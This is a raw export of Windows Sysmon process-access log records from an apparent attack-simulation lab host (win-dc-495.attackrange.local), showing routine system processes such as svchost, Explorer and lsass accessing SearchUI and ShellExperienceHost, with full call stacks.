13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11564624C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11564624C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000012095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000012091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.383{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.367{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.367{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.367{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.367{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000012078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.258{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
